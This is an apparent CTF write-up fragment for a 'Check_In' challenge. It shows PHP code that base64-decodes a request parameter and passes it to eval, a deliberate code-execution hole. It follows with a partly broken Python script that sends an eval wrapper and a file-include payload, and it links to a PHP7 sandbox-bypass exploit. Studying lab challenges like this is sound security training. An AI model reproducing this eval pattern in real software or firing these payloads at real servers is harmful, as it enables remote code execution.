https://www.gem-love.com/ctf/2361.html#CheckIN
https://github.com/mm0r1/exploits/blob/master/php7-gc-bypass/exploit.php
<title>Check_In</title>
<?php
highlight_file(__FILE__);
class ClassName
{
public $code = null;
public $decode = null;
function __construct()
{
$this->code = @$this->x()[‘Ginkgo‘];
$this->decode = @base64_decode( $this->code );
@Eval($this->decode);
}
public function x()
{
return $_REQUEST;
}
}
new ClassName();
import requests
from base64 import *
from urllib.parse import quote as q
payload = "var_dump(include(‘/tmp/1.txt‘));"
#url = "http://8727791d-0b5b-41f6-a3c4-e33252808486.node3.buuoj.cn/?Ginkgo=ZXZhbCgkX0dFVFsnYSddKTs=&a="
#payload = b64encode(payload.encode())
payload = q(payload)
r = requests.get(url+payload)
print(url+payload)
print(r.text[3053:])
原文:https://www.cnblogs.com/youmg/p/12957708.html